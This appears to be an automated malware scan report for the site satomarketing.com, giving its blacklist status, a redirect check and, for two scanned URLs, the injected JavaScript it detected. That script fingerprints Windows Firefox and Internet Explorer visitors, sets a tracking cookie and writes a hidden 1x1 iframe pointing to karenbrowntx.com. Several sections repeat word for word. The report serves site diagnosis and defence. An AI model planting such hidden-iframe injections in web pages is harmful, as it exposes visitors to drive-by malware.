Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=satomarketing.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.satomarketing.com/ | 200 OK Content-Length: 2409 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: karenbrowntx.com ...[1846 bytes skipped]... e.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='v48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","v48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {} Decoded script: <iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe> Malicious iFrame found. The same iFrame was found in 46 websites. size: 1x1 src: http://karenbrowntx.com This URL is marked by Google as suspicious <iframe src="http://karenbrowntx.com" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://www.satomarketing.com/test404page.js | 200 OK Content-Length: 2409 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: karenbrowntx.com ...[1846 bytes skipped]... e.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='v48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","v48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {} Decoded script: <iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe> Malicious iFrame found. The same iFrame was found in 46 websites. size: 1x1 src: http://karenbrowntx.com This URL is marked by Google as suspicious <iframe src="http://karenbrowntx.com" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: satomarketing.com
Result:
GET / HTTP/1.1
Host: satomarketing.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: satomarketing.com
Referer: http://www.google.com/search?q=satomarketing.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: satomarketing.com
Referer: http://www.google.com/search?q=satomarketing.com
Result:
The result is similar to the first query. There are no suspicious redirects found.